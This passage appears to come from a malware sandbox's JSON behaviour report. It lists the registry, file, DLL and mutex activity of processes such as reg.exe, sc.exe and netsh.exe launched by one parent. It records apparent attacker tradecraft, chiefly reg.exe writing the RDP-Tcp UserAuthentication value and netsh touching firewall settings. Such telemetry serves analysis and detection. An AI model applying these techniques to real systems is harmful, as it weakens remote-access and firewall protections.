"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Tracing Level",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\UserenvDebugLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshDllName",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\DoNotUseSSL",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousUploads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\Extensions\\RemoteRpcDll",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ServerRole",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\crypt32\\DebugHeapFlags",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\GpSvcDebugLevel",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxSimultaneousDownloads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\BlockSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Rpc\\SecurityService\\DefaultAuthLevel",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\RepubQuorumSize",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\CurrentBuildNumber",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\TransportDllPath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\MachineThrottling",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\MaxPendingDownloads",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\LDAP\\LdapClientIntegrity",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager\\MinBackoffWindow",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\NumBlocksPerSegment",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Component Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider\\Type",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Config Clsid",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\CryptoAlgo",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Enabled",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPHLPSVC\\config\\Connectivity_Platform_Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\ClientAuth",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Config Clsid",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\eapqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Config Clsid",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\p2pcollab.dll,-8042",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Vendor Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Info Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enable Tracing",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Upgrade",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Registration Date",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dnsapi.dll,-103",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\Restricted\\Seed",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-101",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-100",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\tsgqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\DevicePath",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32\\(Default)",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Friendly Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\ForceRoamingDetect",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621\\Description",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Description",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledProcesses\\F6C4EC9A",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619\\Version",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\DisabledSessions\\GlobalSession",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SQMClient\\Windows\\CEIPEnable",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-103",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-102",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Validator Clsid",
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617\\Validator Clsid",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623\\Registration Date",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming\\RefreshProcName",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\FipsAlgorithmPolicy\\Enabled",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7\\Name",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider\\Type",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TCPIP6\\Parameters\\DisabledComponents",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\PlumbIpsecPolicy"
]
},
"first_seen": 1574704402.312374,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\reg.exe",
"process_name": "reg.exe",
"pid": 3408,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\KERNELBASE.dll.mui",
"C:\\Windows\\Globalization\\Sorting\\sortdefault.nls"
],
"regkey_opened": [
"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\UserAuthentication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\GRE_Initialize\\DisableMetaFiles",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\en-US",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\en-US"
],
"dll_loaded": [
"kernel32.dll"
],
"regkey_written": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\UserAuthentication"
]
},
"first_seen": 1574704405.593626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\sc.exe",
"process_name": "sc.exe",
"pid": 3924,
"summary": {
"file_opened": [
"C:\\Windows\\SysWOW64\\en-US\\sc.exe.mui"
],
"regkey_read": [
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\Language\\InstallLanguageFallback",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\PreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\Type",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\Windows Error Reporting\\WMR\\Disable",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\UILanguages\\en-US\\AlternateCodePage",
"HKEY_CURRENT_USER\\Control Panel\\Desktop\\MuiCached\\MachinePreferredUILanguages",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\EMPTY"
]
},
"first_seen": 1574704394.593626,
"ppid": 2588
},
{
"process_path": "C:\\Windows\\SysWOW64\\netsh.exe",
"process_name": "netsh.exe",
"pid": 3928,
"summary": {
"file_recreated": [
"\\Device\\Http\\Communication",
"\\Device\\KsecDD"
],
"regkey_written": [
"HKEY_CURRENT_USER\\Local Settings\\MuiCache\\2\\52C64B7E\\LanguageList"
],
"dll_loaded": [
"RASMONTR.DLL",
"WSHELPER.DLL",
"RpcRtRemote.dll",
"kernel32.dll",
"NSHIPSEC.DLL",
"HTTPAPI.dll",
"API-MS-WIN-Service-Management-L2-1-0.dll",
"HNETMON.DLL",
"API-MS-WIN-Service-Management-L1-1-0.dll",
"C:\\Windows\\SysWOW64\\bcryptprimitives.dll",
"API-MS-Win-Core-LocalRegistry-L1-1-0.dll",
"IFMON.DLL",
"RPCNSH.DLL",
"ole32.dll",
"CRYPTSP.dll",
"USER32.dll",
"NETIOHLP.DLL",
"API-MS-WIN-Service-winsvc-L1-1-0.dll",
"ADVAPI32.dll",
"NSHWFP.DLL",
"NAPMONTR.DLL",
"NSHHTTP.DLL",
"WHHELPER.DLL",
"PEERDISTSH.DLL",
"GPAPI.dll",
"FWCFG.DLL",
"AUTHFWCFG.DLL",
"P2PNETSH.DLL",
"DOT3CFG.DLL",
"WLANCFG.DLL",
"DHCPCMONITOR.DLL",
"userenv.dll"
],
"file_opened": [
"C:\\Windows\\System32\\FirewallAPI.dll"
],
"regkey_opened": [
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Strong Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS and Diffie-Hellman Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CacheMgr\\Republication",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\Defaults\\Provider",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\PeerDist",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc\\Extensions",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HostedCache",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79623",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\BFE",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\PolicyProvider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Publisher",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79621",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79623",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Discovery",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DiscoveryManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\iphlpsvc\\Config",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\(Default)",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip6\\Parameters",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Protocol",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HostedCache\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HandleMgr",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Cryptographic Provider v1.0",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Publisher",
"HKEY_CURRENT_USER\\Interface\\{00000134-0000-0000-C000-000000000046}",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Upload",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base DSS Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\HostedCache",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.64.1.1!7",
"HKEY_LOCAL_MACHINE\\System\\Setup",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft RSA SChannel Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Roaming",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DiscoveryManager",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\UI",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Service",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Peers\\Connection",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\NapAgent\\LocalConfig",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Setup",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft DH SChannel Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Protocol",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced Cryptographic Provider v1.0",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Peers\\Connection",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CooperativeCaching",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\Download",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.47.1.1!7",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\CacheMgr\\Publication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CacheMgr\\Publication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\Wow6432Node\\Interface\\{00000134-0000-0000-C000-000000000046}\\ProxyStubClsid32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\HandleMgr",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79617",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Download",
"HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\LDAP",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NetSh",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\SecurityManager\\Restricted",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\LocalConfig\\Enroll\\HcsGroups",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Diagnostics",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CooperativeCaching",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\SecurityManager",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\DownloadManager\\UtilityIndex",
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\crypt32",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\CacheMgr\\Republication",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\UtilityIndex",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\Service",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\Roaming",
"HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\System",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Upload",
"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\napagent\\Qecs\\79619",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Base Smart Card Crypto Provider",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\PeerDist\\SecurityManager\\Restricted",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.44.3.4!7",
"HKEY_LOCAL_MACHINE\\SYSTEM\\Setup",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion",
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\\DownloadManager\\Discovery",
"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc\\SecurityService"
],
"file_exists": [
"C:\\Windows\\System32\\napipsec.dll",
"C:\\Windows\\System32\\qagentrt.dll",
"C:\\Windows\\System32\\EAPQEC.DLL",
"C:\\Windows\\System32\\dnsapi.dll",
"C:\\Windows\\System32\\DHCPQEC.DLL",
"C:\\Windows\\System32\\p2pcollab.dll",
"C:\\Windows\\System32\\tsgqec.dll"
],
"mutex": [
"Global\\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7"
],
"guid": [
"{432a1da5-3888-4b9a-a734-cff1e448c5b9}",
"{00000323-0000-0000-c000-000000000046}",
"{e0483ba0-47ff-4d9c-a6d6-7741d0b195f7}",
"{0ca545c6-37ad-4a6c-bf92-9f7610067ef5}",
"{f7898af5-cac4-4632-a2ec-da06e5111af2}",
"{00000146-0000-0000-c000-000000000046}",
"{07a1127b-18cc-422a-b988-e892600fcc74}",
"{304ce942-6e39-40d8-943a-b913c40c9cd4}",
"{ea4a0a43-1c8f-4c7b-a4b1-28ecbd96ba8c}",
"{bf0ec44a-c6ae-4bc5-a0ca-d33fa6c9c6c2}",
"{eb082ba1-df8a-46be-82f3-35bf9e9be52f}"
],
"regkey_read": [
